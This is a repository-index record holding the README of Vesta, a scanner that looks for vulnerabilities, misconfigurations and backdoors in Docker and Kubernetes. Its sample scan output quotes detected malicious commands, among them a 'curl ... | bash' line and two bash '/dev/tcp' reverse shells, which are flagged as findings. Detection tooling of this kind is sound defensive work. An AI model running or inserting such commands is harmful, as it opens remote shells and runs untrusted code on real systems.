{"id":37148047,"url":"https://github.com/kvesta/vesta","last_synced_at":"2026-01-14T17:28:36.680Z","repository":{"id":64209189,"uuid":"573715464","full_name":"kvesta/vesta","owner":"kvesta","description":"A static analysis of vulnerabilities, Docker and Kubernetes cluster configuration detect toolkit based on the real penetration of cloud computing","archived":false,"fork":false,"pushed_at":"2025-05-28T16:28:16.000Z","size":4123,"stargazers_count":199,"open_issues_count":1,"forks_count":29,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-05-28T17:41:42.334Z","etag":null,"topics":["cluster-analysis","docker","go","kubernetes","vesta","vulnerability-scanners"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/kvesta.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2022-12-03T07:31:51.000Z","updated_at":"2025-05-28T16:28:20.000Z","dependencies_parsed_at":"2023-10-01T12:39:30.620Z","dependency_job_id":"6a83a358-157b-4f75-aef5-b966c420de63","html_url":"https://github.com/kvesta/vesta","commit_stats":{"total_commits":80,"total_committers":5,"mean_commits":16.0,"dds":0.125,"last_synced_commit":"dab816ee18105ccdd5e1c3bfffcdedb08841c478"},"previous_names":[],"tags_count":11,"template":false,"template_full_name":null,"purl":"pkg:github/kvesta/vesta","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kvesta%2Fvesta","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kvesta%2Fvesta/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kvesta%2Fvesta/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kvesta%2Fvesta/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/kvesta","download_url":"https://codeload.github.com/kvesta/vesta/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kvesta%2Fvesta/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28427885,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-14T16:38:47.836Z","status":"ssl_error","status_checked_at":"2026-01-14T16:34:59.695Z","response_time":107,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cluster-analysis","docker","go","kubernetes","vesta","vulnerability-scanners"],"created_at":"2026-01-14T17:28:35.939Z","updated_at":"2026-01-14T17:28:36.671Z","avatar_url":"https://github.com/kvesta.png","language":"Go","funding_links":[],"categories":["云安全"],"sub_categories":[],"readme":"\u003cp align=\"center\" style=\"text-align: center\"\u003e\n \u003cimg src=\"https://user-images.githubusercontent.com/35037256/212051309-56468d85-4132-4780-9722-d1c0dcc79b1b.png\" width=\"55%\"\u003e\n\u003cbr/\u003e\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n A static analysis of vulnerabilities, Docker and Kubernetes cluster configuration detect toolkit based on the real penetration of cloud computing.\n\u003c/p\u003e\n\n\u003cdiv align=\"center\"\u003e\n\u003cstrong\u003e\n\u003csamp\u003e\n\n[English](README.md) · [简体中文](README.zh-Hans.md)\n\n\u003c/samp\u003e\n\u003c/strong\u003e\n\u003c/div\u003e\n\n## Overview\n\nVesta is a static analysis of vulnerabilities, Docker and Kubernetes cluster configuration detect toolkit. It inspects Kubernetes and Docker configures,\ncluster pods, and containers with safe practices.\n\u003cbr/\u003e\n\u003cbr/\u003e\nVesta is a flexible toolkit which can run on physical machines in different types of systems (Windows, Linux, MacOS).\n\n## What can vesta check\n\n\u003e Scan\n- Support scanning input\n - image\n - container\n - filesystem\n - vm (TODO)\n- Scan the vulnerabilities of major package managements\n - apt/apt-get\n - rpm\n - yum\n - dpkg\n- Scan malicious packages and vulnerabilities of language-specific packages\n - Java(Jar, War. major library: log4j)\n - NodeJs(NPM, YARN)\n - Python(Wheel, Poetry)\n - Golang(Go binary)\n - PHP(Composer, major frameworks: laravel, thinkphp, wordpress, wordpress plugins etc)\n - Rust(Rust binary)\n - Others(Others vulnerable which will cause a potential container escape and check suspicious poison image)\n\n\u003e Docker\n\n| Supported | Check Item | Description | Severity | Reference |\n|-----------|---------------------------|------------------------------------------------------------------------|---------------------------|---------------------------------------------------------------------------------------------|\n| ✔ | PrivilegeAllowed | Privileged module is allowed. | critical | [Ref](https://github.com/kvesta/vesta/wiki/Capabilities-and-Privileged-Checking-References) |\n| ✔ | Capabilities | Dangerous capabilities are opening. | critical | [Ref](https://github.com/kvesta/vesta/wiki/Capabilities-and-Privileged-Checking-References) | \n| ✔ | Volume Mount | Mount dangerous location. | critical | [Ref](https://github.com/kvesta/vesta/wiki/Volume-Mount-Checking-References) |\n| ✔ | Docker Unauthorized | 2375 port is opening and unauthorized. | critical | [Ref](https://github.com/vulhub/vulhub/blob/master/docker/unauthorized-rce/README.md) |\n| ✔ | Kernel version | Kernel version is under the escape version. | critical | [Ref](https://github.com/kvesta/vesta/wiki/Kernel-Version-References) |\n| ✔ | Network Module | Net Module is `host` and containerd version less than 1.41. | critical/medium | |\n| ✔ | Pid Module | Pid Module is `host`. | high | |\n| ✔ | Docker Server version | Server version is included the vulnerable version. | critical/high/ medium/low | |\n| ✔ | Docker env password check | Check weak password in database. | high/medium | |\n| ✔ | Docker History | Docker layers and environment have some dangerous commands. | high/medium | |\n| ✔ | Docker Backdoor | Docker env command has malicious commands. | critical/high | |\n| ✔ | Docker Swarm | Docker swarm has dangerous config or secrets or containers are unsafe. | medium/low | |\n| ✔ | Docker supply chain | Docker supply chain has vulnerable configurations | critical/high/ medium | [Ref](https://github.com/kvesta/vesta/wiki/Docker-supply-chain-Checking-References) |\n\n---\n\n\n\u003e Kubernetes\n\n| Supported | Check Item | Description | Severity | Reference |\n|-----------|----------------------------------------------------------|----------------------------------------------------------------------------|---------------------------|-----------------------------------------------------------------------------------------------------|\n| ✔ | PrivilegeAllowed | Privileged module is allowed. | critical | [Ref](https://github.com/kvesta/vesta/wiki/Capabilities-and-Privileged-Checking-References) |\n| ✔ | Capabilities | Dangerous capabilities are opening. | critical | [Ref](https://github.com/kvesta/vesta/wiki/Capabilities-and-Privileged-Checking-References) |\n| ✔ | PV and PVC | PV is mounted the dangerous location and is active. | critical/medium | [Ref](https://github.com/kvesta/vesta/wiki/Volume-Mount-Checking-References) |\n| ✔ | RBAC | RBAC has some unsafe configurations in clusterrolebingding or rolebinding. | high/medium/ low/warning | |\n| ✔ | Kubernetes-dashborad | Checking `-enable-skip-login` and account permission. | critical/high/low | [Ref](https://blog.heptio.com/on-securing-the-kubernetes-dashboard-16b09b1b7aca) |\n| ✔ | Kernel version | Kernel version is under the escape version. | critical | [Ref](https://github.com/kvesta/vesta/wiki/Kernel-Version-References) |\n| ✔ | Docker Server version (k8s versions is less than v1.24) | Server version is included the vulnerable version. | critical/high/ medium/low | |\n| ✔ | Kubernetes certification expiration | Certification is expired after 30 days. | medium | |\n| ✔ | ConfigMap and Secret check | Check weak password in ConfigMap or Secret. | high/medium/low | [Ref](https://github.com/kvesta/vesta/wiki/ConfigMap-and-Secret-Checking-References) |\n| ✔ | PodSecurityPolicy check (k8s version under the v1.25) | PodSecurityPolicy tolerates dangerous pod configurations. | high/medium/low | [Ref](https://kubernetes.io/blog/2021/04/06/podsecuritypolicy-deprecation-past-present-and-future/) |\n| ✔ | Auto Mount ServiceAccount Token | Mounting default service token. | critical/high/ medium/low | [Ref](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/) |\n| ✔ | NoResourceLimits | No resource limits are set. | low | [Ref](https://github.com/kvesta/vesta/wiki/Resource-limitation-Checking-References) |\n| ✔ | Job and Cronjob | No seccomp or seLinux are set in Job or CronJob. | low | [Ref](https://www.aquasec.com/cloud-native-academy/docker-container/docker-cis-benchmark/) |\n| ✔ | Envoy admin | Envoy admin is opening and listen to `0.0.0.0`. | high/medium | [Ref](https://www.envoyproxy.io/docs/envoy/latest/start/quick-start/admin#admin) |\n| ✔ | Cilium version | Cilium has vulnerable version. | critical/high/ medium/low | [Ref](https://security.snyk.io/package/golang/github.com%2Fcilium%2Fcilium) |\n| ✔ | Istio configurations | Istio has vulnerable version and vulnerable configurations. | critical/high/ medium/low | [Ref](https://istio.io/latest/news/security/) |\n| ✔ | Kubelet 10250/10255 and Kubectl proxy | 10255/10250 port are opening and unauthorized or Kubectl proxy is opening. | high/medium/low | |\n| ✔ | Etcd configuration | Etcd safe configuration checking. | high/medium | |\n| ✔ | Sidecar configurations | Sidecar has some dangerous configurations. | critical/high/ medium/low | |\n| ✔ | Pod annotation | Pod annotation has some unsafe configurations. | high/medium/ low/warning | [Ref](https://github.com/kvesta/vesta/wiki/Annotation-Checking-References) | \n| ✔ | DaemonSet | DaemonSet has unsafe configurations. | critical/high/ medium/low | |\n| ✔ | Backdoor | Backdoor Detection. | critical/high | [Ref](https://github.com/kvesta/vesta/wiki/Backdoor-Detection) |\n| ✔ | Lateral admin movement | Pod specifics a master node. | medium/low | |\n\n\n\n## Build\n\nVesta is built with Go 1.18. \n\n```bash\nmake build\n```\n\n## Quick Start\n\nExample of image or container scan, use `-f` to input by a tar file, start vesta:\n\n```bash\n# Container\nvesta scan image cve-2019-14234_web:latest\nvesta scan image -f example.tar\n\n# Image\nvesta scan container \u003cCONTAINER ID\u003e\nvesta scan container -f example.tar\n\n# Filesystem\nvesta scan fs \u003cpath_of_filesystem\u003e\n```\n\n\nOuput:\n\n```bash\n2022/11/29 22:50:00 Searching for image\n2022/11/29 22:50:19 Begin upgrading vulnerability database\n2022/11/29 22:50:19 Vulnerability Database is already initialized\n2022/11/29 22:50:19 Begin to analyze the layer\n2022/11/29 22:50:35 Begin to scan the layer\n\nDetected 216 vulnerabilities\n\n+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+\n| 208 | python3.6 - Django | 2.2.3 | CVE-2019-14232 | 7.5 | high | An issue was discovered |\n| | | | | | | in Django 1.11.x before |\n| | | | | | | 1.11.23, 2.1.x before 2.1.11, |\n| | | | | | | and 2.2.x before 2.2.4. If |\n| | | | | | | django.utils.text.Truncator's |\n| | | | | | | chars() and words() methods |\n| | | | | | | were passed the html=True |\n| | | | | | | argument, t ... |\n+-----+ +-----------------+------------------+-------+----------+------------------------------------------------------------------+\n| 209 | | 2.2.3 | CVE-2019-14233 | 7.5 | high | An issue was discovered |\n| | | | | | | in Django 1.11.x before |\n| | | | | | | 1.11.23, 2.1.x before 2.1.11, |\n| | | | | | | and 2.2.x before 2.2.4. |\n| | | | | | | Due to the behaviour of |\n| | | | | | | the underlying HTMLParser, |\n| | | | | | | django.utils.html.strip_tags |\n| | | | | | | would be extremely ... |\n+-----+ +-----------------+------------------+-------+----------+------------------------------------------------------------------+\n| 210 | | 2.2.3 | CVE-2019-14234 | 9.8 | critical | An issue was discovered in |\n| | | | | | | Django 1.11.x before 1.11.23, |\n| | | | | | | 2.1.x before 2.1.11, and 2.2.x |\n| | | | | | | before 2.2.4. Due to an error |\n| | | | | | | in shallow key transformation, |\n| | | | | | | key and index lookups for |\n| | | | | | | django.contrib.postgres.f ... |\n+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+\n| 211 | python3.6 - numpy | 1.24.2 | | 8.5 | high | Malicious package is detected in |\n| | | | | | | '/usr/local/lib/python3.6/site-packages/numpy/setup.py', |\n| | | | | | | malicious command \"curl https://vuln.com | bash\" are |\n| | | | | | | detected. |\n+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+\n\nDocker Histories:\n+----+---------------+----------------------------+-------+-------+--------+--------------------------------+\n| ID | NAME | CURRENT/VULNERABLE VERSION | CVEID | SCORE | LEVEL | DESCRIPTION |\n+----+---------------+----------------------------+-------+-------+--------+--------------------------------+\n| 1 | Image History | - / - | - | 0.0 | high | Confusion value found |\n| | | | | | | in ENV: 'command' with |\n| | | | | | | the plain text 'bash -i |\n| | | | | | | \u003e\u0026/dev/tcp/127.0.0.1/9999 0\u003e\u00261 |\n| | | | | | | '. |\n+----+---------------+----------------------------+-------+-------+--------+--------------------------------+\n| 2 | | - / - | - | 0.0 | medium | Docker history has found the |\n| | | | | | | senstive environment with |\n| | | | | | | key 'SECRET_KEY' and value: |\n| | | | | | | 123456. |\n+----+---------------+----------------------------+-------+-------+--------+--------------------------------+\n\n```\n\n\u003cdetails\u003e\n\u003csummary\u003eResult\u003c/summary\u003e\n\n![](https://user-images.githubusercontent.com/35037256/212480788-b2c77ff4-e484-49f8-b283-b0347de7d646.gif)\n\n\u003c/details\u003e\n\nExample of docker config scan, start vesta:\n\n```bash\nvesta analyze docker\n```\n\nOr run with dokcer\n```bash\nmake run.docker\n```\n\nOutput:\n\n```bash\n2022/11/29 23:06:32 Start analysing\n2022/11/29 23:06:32 Getting engine version\n2022/11/29 23:06:32 Getting docker server version\n2022/11/29 23:06:32 Getting kernel version\n\nDetected 3 vulnerabilities\n\n+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+\n| ID | CONTAINER DETAIL | PARAM | VALUE | SEVERITY | DESCRIPTION |\n+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+\n| 1 | Name: Kernel | kernel version | 5.10.104-linuxkit | critical | Kernel version is suffering |\n| | ID: None | | | | the CVE-2022-0492 with |\n| | | | | | CAP_SYS_ADMIN and v1 |\n| | | | | | architecture of cgroups |\n| | | | | | vulnerablility, has a |\n| | | | | | potential container escape. |\n+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+\n| 2 | Name: vesta_vuln_test | kernel version | 5.10.104-linuxkit | critical | Kernel version is suffering |\n| | ID: 207cf8842b15 | | | | the Dirty Pipe vulnerablility, |\n| | | | | | has a potential container |\n| | | | | | escape. |\n+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+\n| 3 | Name: Image Tag | Privileged | true | critical | There has a potential container|\n| | ID: None | | | | escape in privileged module. |\n| | | | | | |\n+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+\n| 4 | Name: Image Configuration | Image History | Image name: | high | Weak password found |\n| | ID: None | | vesta_history_test:latest | | | in command: ' echo |\n| | | | Image ID: 4bc05e1e3881 | | 'password=test123456' \u003e |\n| | | | | | config.ini # buildkit'. |\n+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+\n```\n\nExample of Kubernetes config scan, start vesta:\n\n```bash\nvesta analyze k8s\n```\n\nOutput:\n\n```bash\n2022/11/29 23:15:59 Start analysing\n2022/11/29 23:15:59 Getting docker server version\n2022/11/29 23:15:59 Getting kernel version\n\nDetected 4 vulnerabilities\n\nPods:\n+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+\n| ID | POD DETAIL | PARAM | VALUE | TYPE | SEVERITY | DESCRIPTION |\n+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+\n| 1 | Name: vulntest | Namespace: | sidecar name: vulntest | | true | Pod | critical | There has a potential |\n| | default | Status: Running | | Privileged | | | | container escape in privileged |\n| | Node Name: docker-desktop | | | | | module. |\n+ + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+\n| | | sidecar name: vulntest | | Token:Password123456 | Sidecar EnvFrom | high | Sidecar envFrom ConfigMap has |\n| | | env | | | | found weak password: |\n| | | | | | | 'Password123456'. |\n+ + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+\n| | | sidecar name: sidecartest | | MALWARE: bash -i \u003e\u0026 | Sidecar Env | high | Container 'sidecartest' finds |\n| | | env | /dev/tcp/10.0.0.1/8080 0\u003e\u00261 | | | high risk content(score: |\n| | | | | | | 0.91 out of 1.0), which is a |\n| | | | | | | suspect command backdoor. |\n+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+\n| 2 | Name: vulntest2 | Namespace: | sidecar name: vulntest2 | | CAP_SYS_ADMIN | capabilities.add | critical | There has a potential |\n| | default | Status: Running | | capabilities | | | | container escape in privileged |\n| | Node Name: docker-desktop | | | | | module. |\n+ + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+\n| | | sidecar name: vulntest2 | | true | kube-api-access-lcvh8 | critical | Mount service account |\n| | | automountServiceAccountToken | | | | and key permission are |\n| | | | | | | given, which will cause a |\n| | | | | | | potential container escape. |\n| | | | | | | Reference clsuterRolebind: |\n| | | | | | | vuln-clusterrolebinding | |\n| | | | | | | roleBinding: vuln-rolebinding |\n+ + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+\n| | | sidecar name: vulntest2 | | cpu | Pod | low | CPU usage is not limited. |\n| | | Resource | | | | |\n| | | | | | | |\n+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+\n\nConfigures:\n+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+\n| ID | TYPEL | PARAM | VALUE | SEVERITY | DESCRIPTION |\n+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+\n| 1 | K8s version less than v1.24 | kernel version | 5.10.104-linuxkit | critical | Kernel version is suffering |\n| | | | | | the CVE-2022-0185 with |\n| | | | | | CAP_SYS_ADMIN vulnerablility, |\n| | | | | | has a potential container |\n| | | | | | escape. |\n+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+\n| 2 | ConfigMap | ConfigMap Name: vulnconfig | db.string:mysql+pymysql://dbapp:Password123@db:3306/db | high | ConfigMap has found weak |\n| | | Namespace: default | | | password: 'Password123'. |\n+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+\n| 3 | Secret | Secret Name: vulnsecret-auth | password:Password123 | high | Secret has found weak |\n| | | Namespace: default | | | password: 'Password123'. |\n+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+\n| 4 | ClusterRoleBinding | binding name: | verbs: get, watch, list, | high | Key permissions with key |\n| | | vuln-clusterrolebinding | | create, update | resources: | | resources given to the |\n| | | rolename: vuln-clusterrole | | pods, services | | default service account, which |\n| | | kind: ClusterRole | subject | | | will cause a potential data |\n| | | kind: Group | subject name: | | | leakage. |\n| | | system:serviceaccounts:vuln | | | | |\n| | | namespace: vuln | | | |\n+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+\n| 5 | RoleBinding | binding name: vuln-rolebinding | verbs: get, watch, list, | high | Key permissions with key |\n| | | | rolename: vuln-role | role | create, update | resources: | | resources given to the |\n| | | kind: Role | subject kind: | pods, services | | default service account, which |\n| | | ServiceAccount | subject name: | | | will cause a potential data |\n| | | default | namespace: default | | | leakage. |\n+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+\n| 6 | ClusterRoleBinding | binding name: | verbs: get, watch, list, | warning | Key permission are given |\n| | | vuln-clusterrolebinding2 | | create, update | resources: | | to unknown user 'testUser', |\n| | | rolename: vuln-clusterrole | | pods, services | | printing it for checking. |\n| | | subject kind: User | subject | | | |\n| | | name: testUser | namespace: | | | |\n| | | all | | | |\n+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+\n```\n\n\u003cdetails\u003e\n\u003csummary\u003eResult\u003c/summary\u003e\n\n![](https://user-images.githubusercontent.com/35037256/212480704-c6e6f7ac-6531-4eda-b3a2-1ca99eeedfcf.gif)\n\n\u003c/details\u003e\n\n\n## Help information\n\n```bash\n$./vesta -h\nVesta is a static analysis of vulnerabilities, Docker and Kubernetes configuration detect toolkit\n Tutorial is available at https://github.com/kvesta/vesta\n\nUsage:\n vesta [command]\n\nAvailable Commands:\n analyze Kubernetes analyze\n completion Generate the autocompletion script for the specified shell\n help Help about any command\n scan Container scan\n update Update vulnerability database\n version Print version information and quit\n\nFlags:\n -h, --help help for vesta\n\n```\n\n## Event\n\n### KCon 2023 Weapon list\n- [https://kcon.knownsec.com/index.php?s=bqp\u0026c=category\u0026id=2](https://kcon.knownsec.com/index.php?s=bqp\u0026c=category\u0026id=2)\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkvesta%2Fvesta","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fkvesta%2Fvesta","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkvesta%2Fvesta/lists"}